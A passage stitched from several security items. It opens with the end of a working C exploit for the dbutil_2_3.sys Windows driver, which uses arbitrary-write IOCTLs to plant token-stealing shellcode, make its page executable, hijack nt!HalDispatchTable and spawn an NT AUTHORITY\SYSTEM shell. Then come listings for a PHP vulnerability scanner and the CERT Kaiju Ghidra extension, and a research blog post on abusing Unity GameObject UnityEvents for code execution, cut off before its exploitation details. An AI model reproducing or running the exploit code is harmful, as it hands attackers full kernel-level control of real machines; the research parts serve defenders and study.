            mov rax, [gs:0x188]     ; Current thread (_KTHREAD)
            mov rax, [rax + 0xb8]   ; Current process (_EPROCESS)
            mov rbx, rax        ; Copy current process (_EPROCESS) to rbx
          __loop:
            mov rbx, [rbx + 0x2f0]    ; ActiveProcessLinks
            sub rbx, 0x2f0          ; Go back to current process (_EPROCESS)
            mov rcx, [rbx + 0x2e8]    ; UniqueProcessId (PID)
            cmp rcx, 4          ; Compare PID to SYSTEM PID
            jnz __loop            ; Loop until SYSTEM PID is found

            mov rcx, [rbx + 0x360]    ; SYSTEM token is @ offset _EPROCESS + 0x360
            and cl, 0xf0        ; Clear out _EX_FAST_REF RefCnt
            mov [rax + 0x360], rcx    ; Copy SYSTEM token to current process

            xor rax, rax        ; set NTSTATUS STATUS_SUCCESS
            ret             ; Done!

        */

        // One QWORD arbitrary write
        // Shellcode is 67 bytes (67/8 = 9 unsigned long longs)
        unsigned long long shellcode1 = 0x00018825048B4865;
        unsigned long long shellcode2 = 0x000000B8808B4800;
        unsigned long long shellcode3 = 0x02F09B8B48C38948;
        unsigned long long shellcode4 = 0x0002F0EB81480000;
        unsigned long long shellcode5 = 0x000002E88B8B4800;
        unsigned long long shellcode6 = 0x8B48E57504F98348;
        unsigned long long shellcode7 = 0xF0E180000003608B;
        unsigned long long shellcode8 = 0x4800000360888948;
        unsigned long long shellcode9 = 0x0000000000C3C031;

        // Buffers to send to the driver (write primitive)
        unsigned long long inBuf3[4];
        unsigned long long inBuf4[4];
        unsigned long long inBuf5[4];
        unsigned long long inBuf6[4];
        unsigned long long inBuf7[4];
        unsigned long long inBuf8[4];
        unsigned long long inBuf9[4];
        unsigned long long inBuf10[4];
        unsigned long long inBuf11[4];

        // Values to send
        unsigned long long one3 = 0x4141414141414141;
        unsigned long long two3 = shellcodeLocation;
        unsigned long long three3 = 0x0000000000000000;
        unsigned long long four3 = shellcode1;

        unsigned long long one4 = 0x4141414141414141;
        unsigned long long two4 = shellcodeLocation + 0x8;
        unsigned long long three4 = 0x0000000000000000;
        unsigned long long four4 = shellcode2;

        unsigned long long one5 = 0x4141414141414141;
        unsigned long long two5 = shellcodeLocation + 0x10;
        unsigned long long three5 = 0x0000000000000000;
        unsigned long long four5 = shellcode3;

        unsigned long long one6 = 0x4141414141414141;
        unsigned long long two6 = shellcodeLocation + 0x18;
        unsigned long long three6 = 0x0000000000000000;
        unsigned long long four6 = shellcode4;

        unsigned long long one7 = 0x4141414141414141;
        unsigned long long two7 = shellcodeLocation + 0x20;
        unsigned long long three7 = 0x0000000000000000;
        unsigned long long four7 = shellcode5;

        unsigned long long one8 = 0x4141414141414141;
        unsigned long long two8 = shellcodeLocation + 0x28;
        unsigned long long three8 = 0x0000000000000000;
        unsigned long long four8 = shellcode6;

        unsigned long long one9 = 0x4141414141414141;
        unsigned long long two9 = shellcodeLocation + 0x30;
        unsigned long long three9 = 0x0000000000000000;
        unsigned long long four9 = shellcode7;

        unsigned long long one10 = 0x4141414141414141;
        unsigned long long two10 = shellcodeLocation + 0x38;
        unsigned long long three10 = 0x0000000000000000;
        unsigned long long four10 = shellcode8;

        unsigned long long one11 = 0x4141414141414141;
        unsigned long long two11 = shellcodeLocation + 0x40;
        unsigned long long three11 = 0x0000000000000000;
        unsigned long long four11 = shellcode9;

        inBuf3[0] = one3;
        inBuf3[1] = two3;
        inBuf3[2] = three3;
        inBuf3[3] = four3;

        inBuf4[0] = one4;
        inBuf4[1] = two4;
        inBuf4[2] = three4;
        inBuf4[3] = four4;

        inBuf5[0] = one5;
        inBuf5[1] = two5;
        inBuf5[2] = three5;
        inBuf5[3] = four5;

        inBuf6[0] = one6;
        inBuf6[1] = two6;
        inBuf6[2] = three6;
        inBuf6[3] = four6;

        inBuf7[0] = one7;
        inBuf7[1] = two7;
        inBuf7[2] = three7;
        inBuf7[3] = four7;

        inBuf8[0] = one8;
        inBuf8[1] = two8;
        inBuf8[2] = three8;
        inBuf8[3] = four8;

        inBuf9[0] = one9;
        inBuf9[1] = two9;
        inBuf9[2] = three9;
        inBuf9[3] = four9;

        inBuf10[0] = one10;
        inBuf10[1] = two10;
        inBuf10[2] = three10;
        inBuf10[3] = four10;

        inBuf11[0] = one11;
        inBuf11[1] = two11;
        inBuf11[2] = three11;
        inBuf11[3] = four11;

        DWORD bytesReturned3 = 0;
        DWORD bytesReturned4 = 0;
        DWORD bytesReturned5 = 0;
        DWORD bytesReturned6 = 0;
        DWORD bytesReturned7 = 0;
        DWORD bytesReturned8 = 0;
        DWORD bytesReturned9 = 0;
        DWORD bytesReturned10 = 0;
        DWORD bytesReturned11 = 0;

        BOOL interact2 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf3,
          sizeof(inBuf3),
          &inBuf3,
          sizeof(inBuf3),
          &bytesReturned3,
          NULL
        );

        BOOL interact3 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf4,
          sizeof(inBuf4),
          &inBuf4,
          sizeof(inBuf4),
          &bytesReturned4,
          NULL
        );

        BOOL interact4 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf5,
          sizeof(inBuf5),
          &inBuf5,
          sizeof(inBuf5),
          &bytesReturned5,
          NULL
        );

        BOOL interact5 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf6,
          sizeof(inBuf6),
          &inBuf6,
          sizeof(inBuf6),
          &bytesReturned6,
          NULL
        );

        BOOL interact6 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf7,
          sizeof(inBuf7),
          &inBuf7,
          sizeof(inBuf7),
          &bytesReturned7,
          NULL
        );

        BOOL interact7 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf8,
          sizeof(inBuf8),
          &inBuf8,
          sizeof(inBuf8),
          &bytesReturned8,
          NULL
        );

        BOOL interact8 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf9,
          sizeof(inBuf9),
          &inBuf9,
          sizeof(inBuf9),
          &bytesReturned9,
          NULL
        );

        BOOL interact9 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf10,
          sizeof(inBuf10),
          &inBuf10,
          sizeof(inBuf10),
          &bytesReturned10,
          NULL
        );

        BOOL interact10 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf11,
          sizeof(inBuf11),
          &inBuf11,
          sizeof(inBuf11),
          &bytesReturned11,
          NULL
        );

        // A lot of error handling
        if (!interact2 || !interact3 || !interact4 || !interact5 || !interact6 || !interact7 || !interact8 || !interact9 || !interact10)
        {
          printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
          exit(-1);
        }
        else
        {
          printf("[+] Successfully wrote the shellcode to the .data section of dbutil_2_3.sys at address: 0x%llx\n", shellcodeLocation);

          // Clear the no-eXecute bit
          unsigned long long taintedPte = pteBits & 0x0FFFFFFFFFFFFFFF;

          printf("[+] Corrupted PTE bits for the shellcode page: %p\n", taintedPte);

          // Clear the no-eXecute bit in the actual PTE
          // Buffer to send to the driver (write primitive)
          unsigned long long inBuf13[4];

          // Values to send
          unsigned long long one13 = 0x4141414141414141;
          unsigned long long two13 = shellcodePte;
          unsigned long long three13 = 0x0000000000000000;
          unsigned long long four13 = taintedPte;

          // Assign the values
          inBuf13[0] = one13;
          inBuf13[1] = two13;
          inBuf13[2] = three13;
          inBuf13[3] = four13;


          // Interact with the driver
          DWORD bytesReturned13 = 0;

          BOOL interact12 = DeviceIoControl(
            driverHandle,
            IOCTL_WRITE_CODE,
            &inBuf13,
            sizeof(inBuf13),
            &inBuf13,
            sizeof(inBuf13),
            &bytesReturned13,
            NULL
          );

          // Error handling
          if (!interact12)
          {
            printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
          }
          else
          {
            printf("[+] Successfully corrupted the PTE of the shellcode page! The kernel mode page holding the shellcode should now be RWX!\n");

            // Offset to nt!HalDispatchTable+0x8
            unsigned long long halDispatch = baseofKernel + 0x427258;

            // Use arbitrary read primitive to preserve nt!HalDispatchTable+0x8
            // Buffer to send to the driver (write primitive)
            unsigned long long inBuf14[4];

            // Values to send
            unsigned long long one14 = 0x4141414141414141;
            unsigned long long two14 = halDispatch;
            unsigned long long three14 = 0x0000000000000000;
            unsigned long long four14 = 0x0000000000000000;

            // Assign the values
            inBuf14[0] = one14;
            inBuf14[1] = two14;
            inBuf14[2] = three14;
            inBuf14[3] = four14;

            // Interact with the driver
            DWORD bytesReturned14 = 0;

            BOOL interact13 = DeviceIoControl(
              driverHandle,
              IOCTL_READ_CODE,
              &inBuf14,
              sizeof(inBuf14),
              &inBuf14,
              sizeof(inBuf14),
              &bytesReturned14,
              NULL
            );

            // Error handling
            if (!interact13)
            {
              printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
            }
            else
            {
              // Last member of read array should contain preserved nt!HalDispatchTable+0x8 value
              unsigned long long preservedHal = inBuf14[3];

              printf("[+] Preserved nt!HalDispatchTable+0x8 value: 0x%llx\n", preservedHal);

              // Leveraging arbitrary write primitive to overwrite nt!HalDispatchTable+0x8
              // Buffer to send to the driver (write primitive)
              unsigned long long inBuf15[4];

              // Values to send
              unsigned long long one15 = 0x4141414141414141;
              unsigned long long two15 = halDispatch;
              unsigned long long three15 = 0x0000000000000000;
              unsigned long long four15 = shellcodeLocation;

              // Assign the values
              inBuf15[0] = one15;
              inBuf15[1] = two15;
              inBuf15[2] = three15;
              inBuf15[3] = four15;

              // Interact with the driver
              DWORD bytesReturned15 = 0;

              BOOL interact14 = DeviceIoControl(
                driverHandle,
                IOCTL_WRITE_CODE,
                &inBuf15,
                sizeof(inBuf15),
                &inBuf15,
                sizeof(inBuf15),
                &bytesReturned15,
                NULL
              );

              // Error handling
              if (!interact14)
              {
                printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
              }
              else
              {
                printf("[+] Successfully overwrote the pointer at nt!HalDispatchTable+0x8!\n");

                // Locating nt!NtQueryIntervalProfile
                NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(
                  GetModuleHandle(
                    TEXT("ntdll.dll")),
                  "NtQueryIntervalProfile"
                );

                // Error handling
                if (!NtQueryIntervalProfile)
                {
                  printf("[-] Error! Unable to find ntdll!NtQueryIntervalProfile! Error: %d\n", GetLastError());
                  exit(1);
                }
                else
                {
                  // Print update for found ntdll!NtQueryIntervalProfile
                  printf("[+] Located ntdll!NtQueryIntervalProfile at: 0x%llx\n", NtQueryIntervalProfile);

                  // Calling nt!NtQueryIntervalProfile
                  ULONG exploit = 0;

                  NtQueryIntervalProfile(
                    0x1234,
                    &exploit
                  );

                  // Restoring nt!HalDispatchTable+0x8
                  // Buffer to send to the driver (write primitive)
                  unsigned long long inBuf16[4];

                  // Values to send
                  unsigned long long one16 = 0x4141414141414141;
                  unsigned long long two16 = halDispatch;
                  unsigned long long three16 = 0x0000000000000000;
                  unsigned long long four16 = preservedHal;

                  // Assign the values
                  inBuf16[0] = one16;
                  inBuf16[1] = two16;
                  inBuf16[2] = three16;
                  inBuf16[3] = four16;

                  // Interact with the driver
                  DWORD bytesReturned16 = 0;

                  BOOL interact15 = DeviceIoControl(
                    driverHandle,
                    IOCTL_WRITE_CODE,
                    &inBuf16,
                    sizeof(inBuf16),
                    &inBuf16,
                    sizeof(inBuf16),
                    &bytesReturned16,
                    NULL
                  );

                  // Error handling
                  if (!interact15)
                  {
                    printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
                  }
                  else
                  {
                    printf("[+] Successfully restored the pointer at nt!HalDispatchTable+0x8!\n");
                    printf("[+] Enjoy the NT AUTHORITY\\SYSTEM shell!\n");

                    // Spawning an NT AUTHORITY\SYSTEM shell
                    system("cmd.exe /c cmd.exe /K cd C:\\");
                  }
                }
              }
            }
          }
        }
      }
    }
  }
}

// Call exploitWork()
void main(void)
{
  exploitWork();
}

Php_Code_Analysis - San your PHP code for vulnerabilities

KitPloit - PenTest & Hacking Tools

Zion3R

25 May 2021 at 21:30

This script will scan your code

the script can find

check_file_upload issues
host_header_injection
SQl injection
insecure deserialization
open_redirect
SSRF
XSS
LFI
command_injection

features

fast
simple report

usage:

python code.py <file name> >>> this will scan one file
python code.py >>> this will scan full folder (.)
python code.py <path> >>> scan full folder

Download Php_Code_Analysis

Kaiju - A Binary Analysis Framework Extension For The Ghidra Software Reverse Engineering Suite

KitPloit - PenTest & Hacking Tools

Zion3R

30 May 2021 at 21:30

CERT Kaiju is a collection of binary analysis tools for Ghidra.

This is a Ghidra/Java implementation of some features of the CERT Pharos Binary Analysis Framework, particularly the function hashing and malware analysis tools, but is expected to grow new tools and capabilities over time.

As this is a new effort, this implementation does not yet have full feature parity with the original C++ implementation based on ROSE; however, the move to Java and Ghidra has actually enabled some new features not available in the original framework -- notably, improved handling of non-x86 architectures. Since some significant re-architecting of the framework and tools is taking place, and the move to Java and Ghidra enables different capabilities than the C++ implementation, the decision was made to utilize new branding such that there would be less confusion between implementations when discussing the different tools and capabilities.

Our intention for the near future is to maintain both the original Pharos framework as well as Kaiju, side-by-side, since both can provide unique features and capabilities.

CAVEAT: As a prototype, there are many issues that may come up when evaluating the function hashes created by this plugin. For example, unlike the Pharos implementation, Kaiju's function hashing module will create hashes for very small functions (e.g., ones with a single instruction like RET causing many more unintended collisions). As such, analytical results may vary between this plugin and Pharos fn2hash.

Quick Installation

Pre-built Kaiju packages are available. Simply download the ZIP file corresponding with your version of Ghidra and install according to the instructions below. It is recommended to install via Ghidra's graphical interface, but it is also possible to manually unzip into the appropriate directory to install.

CERT Kaiju requires the following runtime dependencies:

Ghidra 9.1+ (9.2+ recommended)
Java 11+ (we recommend OpenJDK 11)

NOTE: It is also possible to build the extension package on your own and install it. Please see the instructions under the "Build Kaiju Yourself" section below.

Graphical Installation

Start Ghidra, and from the opening window, select from the menu: File > Install Extension. Click the plus sign at the top of the extensions window, navigate and select the .zip file in the file browser and hit OK. The extension will be installed and a checkbox will be marked next to the name of the extension in the window to let you know it is installed and ready.

The interface will ask you to restart Ghidra to start using the extension. Simply restart, and then Kaiju's extra features will be available for use interactively or in scripts.

Some functionality may require enabling Kaiju plugins. To do this, open the Code Browser then navigate to the menu File > Configure. In the window that pops up, click the Configure link below the "CERT Kaiju" category icon. A pop-up will display all available publicly released Kaiju plugins. Check any plugins you wish to activate, then hit OK. You will now have access to interactive plugin features.

If a plugin is not immediately visible once enabled, you can find the plugin underneath the Window menu in the Code Browser.

Experimental "alpha" versions of future tools may be available from the "Experimental" category if you wish to test them. However these plugins are definitely experimental and unsupported and not recommended for production use. We do welcome early feedback though!

Manual Installation

Ghidra extensions like Kaiju may also be installed manually by unzipping the extension contents into the appropriate directory of your Ghidra installation. For more information, please see The Ghidra Installation Guide.

Usage

Kaiju's tools may be used either in an interactive graphical way, or via a "headless" mode more suited for batch jobs. Some tools may only be available for graphical or headless use, by the nature of the tool.

Interactive Graphical Interface

Kaiju creates an interactive graphical interface (GUI) within Ghidra utilizing Java Swing and Ghidra's plugin architecture.

Most of Kaiju's tools are actually Analysis plugins that run automatically when the "Auto Analysis" option is chosen, either upon import of a new executable to disassemble, or by directly choosing Analysis > Auto Analyze... from the code browser window. You will see several CERT Analysis plugins selected by default in the Auto Analyze tool, but you can enable/disable any as desired.

The Analysis tools must be run before the various GUI tools will work, however. In some corner cases, it may even be helpful to run the Auto Analysis twice to ensure all of the metadata is produced to create correct partitioning and disassembly information, which in turn can influence the hashing results.

Analyzers are automatically run during Ghidra's analysis phase and include:

DisasmImprovements = improves the function partitioning of the disassembly compared to the standard Ghidra partitioning.
Fn2Hash = calculates function hashes for all functions in a program and is used to generate YARA signatures for programs.

The GUI tools include:

Function Hash Viewer = a plugin that displays an interactive list of functions in a program and several types of hashes. Analysts can use this to export one or more functions from a program into YARA signatures.
- Select Window > CERT Function Hash Viewer from the menu to get started with this tool if it is not already visible. A new window will appear displaying a table of hashes and other data. Buttons along the top of the window can refresh the table or export data to file or a YARA signature. This window may also be docked into the main Ghidra CodeBrowser for easier use alongside other plugins. More extensive usage documentation can be found in Ghidra's Help > Contents menu when using the tool.
OOAnalyzer JSON Importer = a plugin that can load, parse, and apply Pharos-generated OOAnalyzer results to object oriented C++ executables in a Ghidra project. When launched, the plugin will prompt the user for the JSON output file produced by OOAnalyzer that contains information about recovered C++ classes. After loading the JSON file, recovered C++ data types and symbols found by OOAnalyzer are updated in the Ghidra Code Browser. The plugin's design and implementation details are described in our SEI blog post titled Using OOAnalyzer to Reverse Engineer Object Oriented Code with Ghidra.
- Select CERT > OOAnalyzer Importer from the menu to get started with this tool. A simple dialog popup will ask you to locate the JSON file you wish to import. More extensive usage documentation can be found in Ghidra's Help > Contents menu when using the tool.

Command-line "Headless" Mode

Ghidra also supports a "headless" mode allowing tools to be run in some circumstances without use of the interactive GUI. These commands can therefore be utilized for scripting and "batch mode" jobs of large numbers of files.

The headless tools largely rely on Ghidra's GhidraScript functionality.

Headless tools include:

fn2hash = automatically run Fn2Hash on a given program and export all the hashes to a CSV file specified
fn2yara = automatically run Fn2Hash on a given program and export all hash data as YARA signatures to the file specified
fnxrefs = analyze a Program and export a list of Functions based on entry point address that have cross-references in data or other parts of the Program

A simple shell launch script named kaijuRun has been included to run these headless commands for simple scenarios, such as outputing the function hashes for every function in a single executable. Assuming the GHIDRA_INSTALL_DIR variable is set, one might for example run the launch script on a single executable as follows:

$GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju/kaijuRun fn2hash example.exe

This command would output the results to an automatically named file as example.exe.Hashes.csv.

Basic help for the kaijuRun script is available by running:

$GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju/kaijuRun --help

Please see docs/HeadlessKaiju.md file in the repository for more information on using this mode and the kaijuRun launcher script.

Further Documentation and Help

More comprehensive documentation and help is available, in one of two formats.

See the docs/ directory for Markdown-formatted documentation and help for all Kaiju tools and components. These documents are easy to maintain and edit and read even from a command line.

Alternatively, you may find the same documentation in Ghidra's built-in help system. To access these help docs, from the Ghidra menu, go to Help > Contents and then select CERT Kaiju from the tree navigation on the left-hand side of the help window.

Please note that the Ghidra Help documentation is the exact same content as the Markdown files in the docs/ directory; thanks to an in-tree gradle plugin, gradle will automatically parse the Markdown and export into Ghidra HTML during the build process. This allows even simpler maintenance (update docs in just one place, not two) and keeps the two in sync.

All new documentation should be added to the docs/ directory.

Building Kaiju Yourself Using Gradle

Alternately to the pre-built packages, you may compile and build Kaiju yourself.

Build Dependencies

CERT Kaiju requires the following build dependencies:

Ghidra 9.1+ (9.2+ recommended)
gradle 6.4+ (latest gradle 6.x recommended, 7.x not supported)
GSON 2.8.6
Java 11+ (we recommend OpenJDK 11)

NOTE ABOUT GRADLE: Please ensure that gradle is building against the same JDK version in use by Ghidra on your system, or you may experience installation problems.

NOTE ABOUT GSON: In most cases, Gradle will automatically obtain this for you. If you find that you need to obtain it manually, you can download gson-2.8.6.jar and place it in the kaiju/lib directory.

Build Instructions

Once dependencies are installed, Kaiju may be built as a Ghidra extension by using the gradle build tool. It is recommended to first set a Ghidra environment variable, as Ghidra installation instructions specify.

In short: set GHIDRA_INSTALL_DIR as an environment variable first, then run gradle without any options:

export GHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>
gradle

NOTE: Your Ghidra install directory is the directory containing the ghidraRun script (the top level directory after unzipping the Ghidra release distribution into the location of your choice.)

If for some reason your environment variable is not or can not be set, you can also specify it on the command like with:

gradle -PGHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>

In either case, the newly-built Kaiju extension will appear as a .zip file within the dist/ directory. The filename will include "Kaiju", the version of Ghidra it was built against, and the date it was built. If all goes well, you should see a message like the following that tells you the name of your built plugin.

Created ghidra_X.Y.Z_PUBLIC_YYYYMMDD_kaiju.zip in <path/to>/kaiju/dist

where X.Y.Z is the version of Ghidra you are using, and YYYYMMDD is the date you built this Kaiju extension.

Optional: Running Tests With AUTOCATS

While not required, you may want to use the Kaiju testing suite to verify proper compilation and ensure there are no regressions while testing new code or before you install Kaiju in a production environment.

In order to run the Kaiju testing suite, you will need to first obtain the AUTOCATS (AUTOmated Code Analysis Testing Suite). AUTOCATS contains a number of executables and related data to perform tests and check for regressions in Kaiju. These test cases are shared with the Pharos binary analysis framework, therefore AUTOCATS is located in a separate git repository.

Clone the AUTOCATS repository with:

git clone https://github.com/cmu-sei/autocats

We recommend cloning the AUTOCATS repository into the same parent directory that holds Kaiju, but you may clone it anywhere you wish.

The tests can then be run with:

gradle -PKAIJU_AUTOCATS_DIR=path/to/autocats/dir test

where of course the correct path is provided to your cloned AUTOCATS repository directory. If cloned to the same parent directory as Kaiju as recommended, the command would look like:

gradle -PKAIJU_AUTOCATS_DIR=../autocats test

The tests cannot be run without providing this path; if you do forget it, gradle will abort and give an error message about providing this path.

Kaiju has a dependency on JUnit 5 only for running tests. Gradle should automatically retrieve and use JUnit, but you may also download JUnit and manually place into lib/ directory of Kaiju if needed.

You will want to run the update command whenever you pull the latest Kaiju source code, to ensure they stay in sync.

First-Time "Headless" Gradle-based Installation

If you compiled and built your own Kaiju extension, you may alternately install the extension directly on the command line via use of gradle. Be sure to set GHIDRA_INSTALL_DIR as an environment variable first (if you built Kaiju too, then you should already have this defined), then run gradle as follows:

export GHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>
gradle install

or if you are unsure if the environment variable is set,

gradle -PGHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir> install

Extension files should be copied automatically. Kaiju will be available for use after Ghidra is restarted.

NOTE: Be sure that Ghidra is NOT running before using gradle to install. We are aware of instances when the caching does not appear to update properly if installed while Ghidra is running, leading to some odd bugs. If this happens to you, simply exit Ghidra and try reinstalling again.

Consider Removing Your Old Installation First

It might be helpful to first completely remove any older install of Kaiju before updating to a newer release. We've seen some cases where older versions of Kaiju files get stuck in the cache and cause interesting bugs due to the conflicts. By removing the old install first, you'll ensure a clean re-install and easy use.

The gradle build process now can auto-remove previous installs of Kaiju if you enable this feature. To enable the autoremove, add the "KAIJU_AUTO_REMOVE" property to your install command, such as (assuming the environment variable is probably set as in previous section):

gradle -PKAIJU_AUTO_REMOVE install

If you'd prefer to remove your old installation manually, perform a command like:

rm -rf $GHIDRA_INSTALL_DIR/Extensions/Ghidra/*kaiju*.zip $GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju

Download Kaiju

Hacking Unity Games with Malicious GameObjects

Include Security Research Blog

Jason Kielpinski

9 June 2021 at 17:01

At IncludeSec our clients are asking us to hack on all sorts of crazy applications from mass scale web systems to IoT devices and low-level firmware. Something that we’re seeing more of is hacking virtual reality systems and mass scale video games so we had a chance to do some research and came up with what we believe to be a novel attack against Unity-powered games!

Specifically, this post will outline:

Two ways I found that GameObjects (a non-code asset type) can be crafted to cause arbitrary code to run.
Five possible ways an attacker might use a malicious GameObject to compromise a Unity game.
How game developers can mitigate the risk.

Unity has also published their own blog post on this subject. Be sure to check that out for their specific recommendations and how to protect against this sort of vulnerability.

Terminology

First a brief primer on the terms I’m going to use for those less familiar with Unity.

GameObjects are entities in Unity that can have any number of components attached.
Components are added to GameObjects to make them do things. They include Unity built-in components, like UI elements and sprite renderers, as well as custom scripted components used to build the game logic.
Assets are the elements that make up the game. This includes images, sounds, scripts, and GameObjects, among other things.
AssetBundles are a way to package non-code assets and allow them to be loaded at runtime (from the web or locally). They are used to decrease initial download size, allow downloadable content, as well as sometimes to enable modding of the game.

Ways a malicious GameObject could get into a game

Before going into details about how a GameObject could execute code, let’s talk about how it would get in the game in the first place so that we’re clear on the attack scenarios. I came up with five ways a malicious GameObject might find its way into a Unity game:

Way 1: the most obvious route is if the game developer downloaded it and added it to the game project. This might be an asset they purchased on the Unity Asset Store, or something they found on GitHub that solved a problem they were having.

Way 2: Unity AssetBundles allow non-script assets (including GameObjects) to be imported into a game at runtime. There may be an assumption that these assets are safe, since they contain no custom script assets, but as you’ll see further into the post that is not a safe assumption. For example, sometimes AssetBundles are used to add modding functionality to a game. If that’s the case, then third-party mods downloaded by a user can unexpectedly cause code execution, similar to running untrusted programs from the internet.

Way 3: AssetBundles can be downloaded from the internet at runtime without transport encryption enabling man-in-the-middle attacks. The Unity documentation has an example of how to do this, partially listed below:

UnityWebRequest uwr = UnityWebRequestAssetBundle.GetAssetBundle("http://www.my-server.com/mybundle")

In the Unity-provided example, the AssetBundle is being downloaded over HTTP. If an AssetBundle is downloaded over HTTP (which lacks the encryption and certificate validation of HTTPS), an attacker with a man-in-the-middle position of whoever is running the game could tamper with the AssetBundle in transit and replace it with a malicious one. This could, for example, affect players who are playing on an untrusted network such as a public WiFi access point.

Way 4: AssetBundles can be downloaded from the internet at runtime with transport encryption but man-in-the-middle attacks might still be possible.

Unity has this to say about certificate validation when using UnityWebRequests:

Some platforms will validate certificates against a root certificate authority store. Other platforms will simply bypass certificate validation completely.

According to the docs, even if you use HTTPS, on certain platforms Unity won’t check certificates to verify it’s communicating with the intended server, opening the door for possible AssetBundle tampering. It’s possible to create your own certificate handler, but only on specific platforms:

Note: Custom certificate validation is currently only implemented for the following platforms – Android, iOS, tvOS and desktop platforms.

I could not find information about which platforms “bypass certificate validation completely”, but I’m guessing it’s the less-common ones? Still, if you’re developing a game that downloads AssetBundles, you might want to verify that certificate validation is working on the platforms you use.

Way 5: Malicious insider. A contributor on a development team or open source project wants to add some bad code to a game. But maybe the dev team has code reviews to prevent this sort of thing. Likely, those code reviews don’t extend to the GameObjects themselves, so the attacker smuggles their code into a GameObject that gets deployed with the game.

Crafting malicious GameObjects

I think it’s pretty obvious why you wouldn’t want arbitrary code running in your game — it might compromise players’ computers, steal their data, crash the game, etc. If the malicious code runs on a development machine, the attacker could potentially steal the source code or pivot to attack the studio’s internal network. Peter Clemenko had another interesting perspective on his blog: essentially, in the near-future augmented-reality cyberpunk ready-player-1 upcoming world an attacker may seek to inject things into a user’s reality to confuse, distract, annoy, and that might cause real-world harm.

So, how can non-script assets get code execution?

Method 1: UnityEvents

Unity has an event system that allows hooking up delegates in code that will be called when an event is triggered. You can use them in your custom scripts for game-specific events, and they are also used on Unity’s built-in UI components (such as Buttons) for event handlers (like onClick) . Additionally, you can add ones to objects such as PointerClick, PointerEnter, Scroll, etc. using an EventTrigger component

One-parameter UnityEvents can be exposed in the inspector by components. In normal usage, setting up a UnityEvent looks like this in the Unity inspector:

First you have to assign a GameObject to receive the event callback (in this case, “Main Camera”). Then you can look through methods and properties on any components attached to that GameObject, and select a handler method.

Many assets in Unity, including scenes and GameObject prefabs, are serialized as YAML files that store the various properties of the object. Opening up the object containing the above event trigger, the YAML looks like this:

MonoBehaviour:
  m_ObjectHideFlags: 0
  m_CorrespondingSourceObject: {fileID: 0}
  m_PrefabInstance: {fileID: 0}
  m_PrefabAsset: {fileID: 0}
  m_GameObject: {fileID: 1978173272}
  m_Enabled: 1
  m_EditorHideFlags: 0
  m_Script: {fileID: 11500000, guid: d0b148fe25e99eb48b9724523833bab1, type: 3}
  m_Name:
  m_EditorClassIdentifier:
  m_Delegates:
  - eventID: 4
    callback:
      m_PersistentCalls:
        m_Calls:
        - m_Target: {fileID: 963194228}
          m_TargetAssemblyTypeName: UnityEngine.Component, UnityEngine
          m_MethodName: SendMessage
          m_Mode: 5
          m_Arguments:
            m_ObjectArgument: {fileID: 0}
            m_ObjectArgumentAssemblyTypeName: UnityEngine.Object, UnityEngine
            m_IntArgument: 0
            m_FloatArgument: 0
            m_StringArgument: asdf
            m_BoolArgument: 0
          m_CallState: 2

The most important part is under m_Delegates — that’s what controls which methods are invoked when the event is triggered. I did some digging in the Unity C# source repo along with some experimenting to figure out what some of these properties are. First, to summarize my findings: UnityEvents can call any method that has a return type void and takes zero or one argument of a supported type. This includes private methods, setters, and static methods. Although the UI restricts you to invoking methods available on a specific GameObject, editing the object’s YAML does not have that restriction — they can call any method in a loaded assembly . You can skip to exploitation below if you don’t need more details of how this works.

Technical details

UnityEvents technically support delegate functions with anywhere from zero to four parameters, but unfortunately Unity does not use any UnityEvents with greater than one parameter for its built-in components (and I found no way to encode more parameters into the YAML). We are therefore limited to one-parameter functions for our attack.

The important fields in the above YAML are:

eventID — This is specific to EventTriggers (rather than UI components.) It specifies the type of event, PointerClick, PointerHover, etc. PointerClick is “4”.
m_TargetAssemblyTypeName — this is the fully qualified .NET type name that the event handler function will be called on. Essentially this takes the form: namespace.typename, assemblyname. It can be anything in one of the assemblies loaded by Unity, including all Unity engine stuff as well as a lot of .NET stuff.
m_callstate — Determines when the event triggers — only during a game, or also while using the Unity Editor:
- 0 – UnityEventCallState.Off
- 1 – UnityEventCallState.EditorAndRuntime
- 2 – UnityEventCallState.RuntimeOnly
m_mode — Determines the argument type of the called function.
- 0 – EventDefined
- 1 – Void,
- 2 – Object,
- 3 – Int,
- 4 – Float,
- 5 – String,
- 6 – Bool
m_target — Specify the Unity object instance that the method will be called on. Specifying m_target: {fileId: 0} allows static methods to be called.

Unity uses C# reflection to obtain the method to call based on the above. The code ultimately used to obtain the method is shown below:

objectType.GetMethod(functionName, BindingFlags.Public | BindingFlags.NonPublic | BindingFlags.Instance | BindingFlags.Static, null, argumentTypes, null);

With the binding flags provided, it’s possible to specify private or public methods, static or instance methods. When calling the function, a delegate is created with type UnityAction that has a return type of void — therefore, the specified function must have a void return type.

Exploitation

My goal after discovering the above was to find some method available in the default loaded assemblies fitting the correct form (static, return void, exactly 1 parameter) which would let me do Bad Things. Ideally, I wanted to get arbitrary code execution, but other things could be interesting too. If I could hook up an event handler to something dangerous, we would have a malicious GameObject.

